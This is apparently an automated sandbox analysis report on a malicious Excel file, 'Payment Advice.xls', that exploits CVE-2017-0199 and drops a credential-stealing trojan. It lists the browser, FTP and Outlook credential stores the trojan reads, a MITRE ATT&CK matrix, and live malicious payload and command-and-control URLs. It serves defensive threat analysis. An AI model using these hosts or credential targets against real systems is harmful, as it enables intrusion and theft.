Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\AppData\Roaming\caspol.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: PopPassword		31_2_0040D069
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: SmtpPassword		31_2_0040D069

Source: Yara match	File source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	13 Exploitation for Client Execution	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	15 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	111 Process Injection	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	14 System Information Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	41 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	2 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Process Discovery	Distributed Component Object Model	11 Email Collection	125 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Advice.xls	21%	ReversingLabs	Win32.Exploit.CVE-2017-0199
Payment Advice.xls	25%	Virustotal		Browse
Payment Advice.xls	100%	Avira	TR/AVI.Agent.xoswb
Payment Advice.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	100%	Avira	HEUR/AGEN.1306899
C:\Users\user\AppData\Local\Temp\~DFAAE5253A99F2DBD6.TMP	100%	Avira	TR/AVI.Agent.xoswb
C:\Users\user\AppData\Roaming\caspol.exe	100%	Avira	HEUR/AGEN.1306899
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	100%	Avira	HEUR/AGEN.1306899
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\caspol.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	71%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
C:\Users\user\AppData\Roaming\caspol.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun

Source	Detection	Scanner	Label	Link
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiond	0%	Avira URL Cloud	safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta	0%	Avira URL Cloud	safe
http://192.3.243.136/	0%	Avira URL Cloud	safe
http://192.3.243.136/55/caspol.e	0%	Avira URL Cloud	safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiong	0%	Avira URL Cloud	safe
https://provit.uk/PII	0%	Avira URL Cloud	safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..	100%	Avira URL Cloud	malware
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	100%	Avira URL Cloud	malware
http://192.3.243.136/	4%	Virustotal		Browse
http://192.3.243.136/55/caspol.e	4%	Virustotal		Browse
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htap	0%	Avira URL Cloud	safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htar	0%	Avira URL Cloud	safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htabK	0%	Avira URL Cloud	safe
https://provit.uk/	0%	Avira URL Cloud	safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback	0%	Avira URL Cloud	safe
http://192.3.243.136/55/caspol.exehR	0%	Avira URL Cloud	safe
94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware
http://94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware
https://provit.uk/l	0%	Avira URL Cloud	safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:	0%	Avira URL Cloud	safe
https://provit.uk/m	0%	Avira URL Cloud	safe
http://192.3.243.136/G	0%	Avira URL Cloud	safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiony	0%	Avira URL Cloud	safe
http://192.3.243.136/55/caspol.exe	100%	Avira URL Cloud	malware
http://192.3.243.136/55/caspol.exep	0%	Avira URL Cloud	safe
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht	0%	Avira URL Cloud	safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion	0%	Avira URL Cloud	safe
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionyX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
provit.uk	198.244.140.41	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
94.156.177.41/simple/five/fre.php	true	Avira URL Cloud: malware	unknown
http://94.156.177.41/simple/five/fre.php	true	Avira URL Cloud: malware	unknown
http://192.3.243.136/55/caspol.exe	true	Avira URL Cloud: malware	unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://192.3.243.136/	mshta.exe, 00000003.00000003.435047316.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiong	mshta.exe, 00000003.00000002.435279648.0000000000293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.428761225.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.000000000030F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta	mshta.exe, 00000003.00000003.435076739.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000320000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.000000000030F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.000000000030F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/55/caspol.e	powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestiond	mshta.exe, 00000003.00000002.435279648.0000000000293000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://provit.uk/PII	mshta.exe, 0000001B.00000003.502670469.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..	mshta.exe, 00000003.00000003.428761225.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436209780.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500808839.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502809223.0000000000365000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502762634.00000000002FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502662622.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.00000000002FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.00000000002FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/server1.crl0	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	rrwscqkDSNwLK.exe, rrwscqkDSNwLK.exe, 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htap	mshta.exe, 0000001B.00000003.496179630.0000000000320000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htar	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.476910335.00000000122A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://provit.uk/	mshta.exe, 00000003.00000003.435047316.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.435279648.00000000002EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.428761225.00000000002EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500808839.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500554359.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.502809223.0000000000365000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.496179630.0000000000364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502662622.0000000000364000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000003.00000003.435076739.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.436232564.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.430469990.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.500832352.0000000003D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.498389463.0000000003D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000002.503055611.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001B.00000003.502670469.0000000003D81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htabK	mshta.exe, 00000003.00000002.436688638.0000000004B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
